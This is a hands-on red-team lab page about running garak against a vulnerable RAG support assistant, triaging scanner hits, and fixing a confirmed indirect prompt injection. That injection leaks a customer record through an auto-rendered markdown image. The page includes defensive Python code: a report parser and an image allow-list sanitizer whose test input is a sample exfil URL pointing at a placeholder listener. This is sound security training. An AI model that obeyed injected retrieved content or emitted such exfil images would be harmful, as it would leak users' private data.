Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives
Run NVIDIA garak as an automated fuzzer against a real vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then do the skill that separates a scanner operator from a red teamer: triage the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.
What you'll learn
- 1. Recon: stand up the vulnerable target behind an OpenAI endpoint
  You are automating red-team testing of DV-RAG-Support, ACME Cloud's…
- 2. Run the scan: fire a broad garak discovery battery at the endpoint
  garak runs a battery of probes (attack generators) against a generator and…
- 3. Read the report: count hits per probe and grade the run
  A garak run produces several artifacts:…
- 4. Triage a false positive: dismiss a detector hit with evidence
  Scanners over-report. The triage skill is asking, for every hit, "did the…
- 5. Confirm a true positive: run the custom probe, prove the effect on the listener
  A true positive is confirmed by reproducing the effect, not by trusting a…
- 6. Harden the render sink: allow-list the one channel the finding rode out on
  Switch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
- 7. Distrust the retrieved context: reframe context as data, never instructions
  The render allow-list from step 6 is the load-bearing fix: it closes the exfil…
- 8. Verify the regression: fixed = 0 findings, reintroduced = re-trips
  A fix only counts when you re-run the exact confirmed attack and watch it fail.
Prerequisites
- Comfortable reading Python and JSON
- Completed (or understand) Module 2 indirect prompt injection
- No ML background required
Skills & technologies you'll practice
This is an advanced-level AI/ML lab.
What you'll do in this lab
This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.
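As a rough illustration of what "reading the run" involves, the sketch below tallies hits per probe and detector from JSONL lines. It assumes each summary record has `entry_type`, `probe`, `detector`, `passed`, and `total` fields; treat those names as an assumption about garak's report schema and check them against the version you run. The sample records and the probe and detector names are invented for illustration, not output from a real scan.

```python
import json


def failure_rates(jsonl_lines):
    """Return {(probe, detector): (failed, total)} from summary records.

    Assumes summary records are marked entry_type == "eval" and carry
    "passed" and "total" counts (an assumption about the report schema).
    """
    rates = {}
    for line in jsonl_lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        entry = json.loads(line)
        if entry.get("entry_type") != "eval":
            continue  # ignore setup, attempt, and other record types
        total = entry["total"]
        failed = total - entry["passed"]
        rates[(entry["probe"], entry["detector"])] = (failed, total)
    return rates


# Illustrative records only; names are hypothetical placeholders.
SAMPLE_LOG = [
    '{"entry_type": "setup"}',
    '{"entry_type": "eval", "probe": "probe_a", "detector": "detector_x", "passed": 8, "total": 10}',
    '{"entry_type": "eval", "probe": "probe_b", "detector": "detector_y", "passed": 10, "total": 10}',
]

rates = failure_rates(SAMPLE_LOG)
for (probe, detector), (failed, total) in sorted(rates.items()):
    print(f"{probe} / {detector}: {failed}/{total} hits")
```

A nonzero hit count here only says that a detector fired. Whether the hit is a real finding is still a triage question.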
You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.
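The fix-then-verify loop can be sketched as a render-side allow-list plus a check that counts images that would still reach a disallowed host. This is a minimal sketch and not the lab's actual fix: the host names, the `sanitize_images` and `count_exfil_images` helpers, and the sample reply are all hypothetical, and the regular expression covers only the simple inline `![alt](url)` form.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only hosts images may be rendered from.
ALLOWED_IMAGE_HOSTS = {"static.acme.example"}

# Matches inline markdown images of the form ![alt](url "optional title").
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def _host(url):
    """Hostname of a URL, or '' for relative or malformed URLs."""
    return urlparse(url).hostname or ""


def sanitize_images(markdown):
    """Replace any image whose host is not allow-listed with inert text."""
    def replace(match):
        alt, url = match.group(1), match.group(2)
        if _host(url) in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep allow-listed images untouched
        return f"[image removed: {alt}]"
    return MD_IMAGE.sub(replace, markdown)


def count_exfil_images(markdown):
    """Count images that would trigger a request to a disallowed host."""
    return sum(
        1 for m in MD_IMAGE.finditer(markdown)
        if _host(m.group(2)) not in ALLOWED_IMAGE_HOSTS
    )


# Hypothetical model reply carrying account data out in an image URL.
leaky = "Done. ![x](http://listener.example:9000/p?d=acct-1234)"
safe = "Our logo: ![logo](https://static.acme.example/logo.png)"

before = count_exfil_images(leaky)
after = count_exfil_images(sanitize_images(leaky))
print(f"findings before fix: {before}, after fix: {after}")
```

Counting the same way before and after the sanitizer mirrors the regression idea: the finding is closed only when the identical payload yields zero outbound images.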